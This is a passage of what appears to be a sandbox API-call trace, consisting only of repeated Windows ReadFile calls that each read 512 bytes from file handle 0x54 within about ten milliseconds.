lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, 